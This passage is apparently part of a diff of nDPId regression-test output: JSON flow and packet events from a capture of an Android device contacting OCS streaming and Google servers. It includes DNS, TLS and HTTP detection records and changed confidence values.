{"version":"TLSv1","client_requested_server_name":"ocs.labgency.ws","ja3":"0534a22b266a64a5cc9a90f7b5c483cc","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652788109,"flow_last_seen":1449652788195,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1449652788195,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":36680,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.OCS","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1","client_requested_server_name":"ocs.labgency.ws","ja3":"0534a22b266a64a5cc9a90f7b5c483cc","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1449652788595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652788595,"pkt":"RQAAPDy5QABABnycwKi0AomHgzS0VhQCr\/++QwAAAACgAjkI02AAAAIEBbQEAggKADWDYAAAAAABAwMG"} 
00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1449652790602,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652790602,"pkt":"RQAAPDy6QABABnybwKi0AomHgzS0VhQCr\/++QwAAAACgAjkI0pgAAAIEBbQEAggKADWEKAAAAAABAwMG"} -00812{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1449652787983,"flow_last_seen":1449652790713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1449652790713,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"ocu03.labgency.ws","url":"ocu03.labgency.ws\/catalog\/vod?v=3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1449652792355,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652792355,"pkt":"RQAAPKb0QABABiV3wKi0AkDpuLy6UxRsAv3YCQAAAACgAjkIcdQAAAIEBbQEAggKADWE2AAAAAABAwMG"} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652797357,"flow_last_seen":1449652797357,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652797357,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":32946,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1449652797357,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652797357,"pkt":"RQAAPAMUQABABslXwKi0AkDpuLyAsgG7QZiF2AAAAACgAjkIz8gAAAIEBbQEAggKADWGzAAAAAABAwMG"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1449652797427,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652797427,"pkt":"RQAANAMVQABABslewKi0AkDpuLyAsgG7QZiF2aTu9RqAEADl+L8AAAEBCAoANYbSHkOFlA=="} 
00744{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1449652797442,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":271,"pkt_l4_len":251,"thread_ts_msec":1449652797442,"pkt":"RQABDwMWQABABsiCwKi0AkDpuLyAsgG7QZiF2aTu9RqAGADlVfIAAAEBCAoANYbUHkOFlBYDAQDWAQAA0gMD4HuK+eOlMdUOH1cZsMt60He+NukWbTB7f1JNaYrt+NsAACjAK8AswC\/AMACeAJ\/ACcAKwBPAFAAzADnAB8ARAJwAnQAvADUABQD\/AQAAgQAAABUAEwAAEG10YWxrLmdvb2dsZS5jb20ACwAEAwABAgAKADQAMgAOAA0AGQALAAwAGAAJAAoAFgAXAAgABgAHABQAFQAEAAUAEgATAAEAAgADAA8AEAARACMAAAANACAAHgYBBgIGAwUBBQIFAwQBBAIEAwMBAwIDAwIBAgICAw=="} -00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652797357,"flow_last_seen":1449652797442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1449652797442,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":32946,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652797357,"flow_last_seen":1449652797442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1449652797442,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":32946,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798230,"flow_last_seen":1449652798230,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1449652798230,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":11793,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1449652798230,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":65,"pkt_l4_len":45,"thread_ts_msec":1449652798230,"pkt":"RQAAQYcjQABAES7OwKi0AggICAguEQA1AC1oEnazAQAAAQAAAAAAAARwbGF5Cmdvb2dsZWFwaXMDY29tAAABAAE="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798230,"flow_last_seen":1449652798230,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1449652798230,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":11793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798230,"flow_last_seen":1449652798230,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1449652798230,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":11793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": 
{"query":"play.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798305,"flow_last_seen":1449652798305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652798305,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.166.95","src_port":47803,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1449652798305,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652798305,"pkt":"RQAAPHAIQABABm7AwKi0AkDppl+6uwG7gNP3IgAAAACgAjkI9zgAAAIEBbQEAggKADWHKgAAAAABAwMG"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1449652798386,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652798386,"pkt":"RQAANHAJQABABm7HwKi0AkDppl+6uwG7gNP3IxI082eAEADlT7wAAAEBCAoANYczAMsH6w=="} 
00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1449652798392,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":236,"pkt_l4_len":216,"thread_ts_msec":1449652798392,"pkt":"RQAA7HAKQABABm4OwKi0AkDppl+6uwG7gNP3IxI082eAGADln0MAAAEBCAoANYczAMsH6xYDAQCzAQAArwMBVmhd\/avXwE9Hbo+g4bJoaBoe\/PaQpNdc4O0Q8a7HcbYAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAQAALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} -00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652798305,"flow_last_seen":1449652798392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1449652798392,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.166.95","src_port":47803,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"5a236bfc3d18ddef1b1f2f4c9e765d66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652798305,"flow_last_seen":1449652798392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1449652798392,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.166.95","src_port":47803,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"5a236bfc3d18ddef1b1f2f4c9e765d66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842535,"flow_last_seen":1449652842535,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652842535,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":24245,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1449652842535,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":56,"pkt_l4_len":36,"thread_ts_msec":1449652842535,"pkt":"RQAAOJhyQABAER2IwKi0AggICAhetQA1ACRtrFcaAQAAAQAAAAAAAAN3d3cDb2NzAmZyAAABAAE="} 
-00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842535,"flow_last_seen":1449652842535,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652842535,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":24245,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"www.ocs.fr","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842535,"flow_last_seen":1449652842535,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652842535,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":24245,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"www.ocs.fr","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":864,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842628,"flow_last_seen":1449652842628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652842628,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1449652842628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652842628,"pkt":"RQAAPD8ZQABABgMtwKi0ArL40NKmXgBQrzCnYwAAAACgAjkIgJAAAAIEBbQEAggKADWYegAAAAABAwMG"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1449652842700,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652842700,"pkt":"RQAAND8aQABABgM0wKi0ArL40NKmXgBQrzCnZDkypeeAEADlhQYAAAEBCAoANZiCGkFpBQ=="} 
00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1449652842701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":204,"pkt_l4_len":184,"thread_ts_msec":1449652842701,"pkt":"RQAAzD8bQABABgKbwKi0ArL40NKmXgBQrzCnZDkypeeAGADlkB4AAAEBCAoANZiCGkFpBUdFVCAvZGF0YV9wbGF0ZWZvcm1lL3Byb2dyYW0vMTg0OTYvdHZfZGV0YWlsX21vcnRkdW5wb3VydzAwMTIyMzZfNzJmNmMuanBnIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkhvc3Q6IHd3dy5vY3MuZnINCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652842628,"flow_last_seen":1449652842701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1449652842701,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"www.ocs.fr","url":"www.ocs.fr\/data_plateforme\/program\/18496\/tv_detail_mortdunpourw0012236_72f6c.jpg","code":0,"content_type":"","user_agent":""}} 
-00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":895,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1449652842628,"flow_last_seen":1449652843470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1449652843470,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"www.ocs.fr","url":"www.ocs.fr\/data_plateforme\/program\/18496\/tv_detail_mortdunpourw0012236_72f6c.jpg","code":0,"content_type":"","user_agent":""}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1449652842628,"flow_last_seen":1449652846380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"}} 
+00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652842628,"flow_last_seen":1449652842701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1449652842701,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"www.ocs.fr","url":"www.ocs.fr\/data_plateforme\/program\/18496\/tv_detail_mortdunpourw0012236_72f6c.jpg","code":0,"content_type":"","user_agent":""}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1449652842628,"flow_last_seen":1449652846380,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.210","src_port":42590,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"}} 
00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1449652786395,"flow_last_seen":1449652787578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":44959,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1449652787596,"flow_last_seen":1449652818681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.131.52","src_port":46166,"dst_port":5122,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Azure","breed":"Acceptable","category":"Cloud"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1449652787596,"flow_last_seen":1449652818681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.131.52","src_port":46166,"dst_port":5122,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 
00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1449652784341,"flow_last_seen":1449652792355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":47699,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1449652784341,"flow_last_seen":1449652792355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652846380,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":47699,"dst_port":5228,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 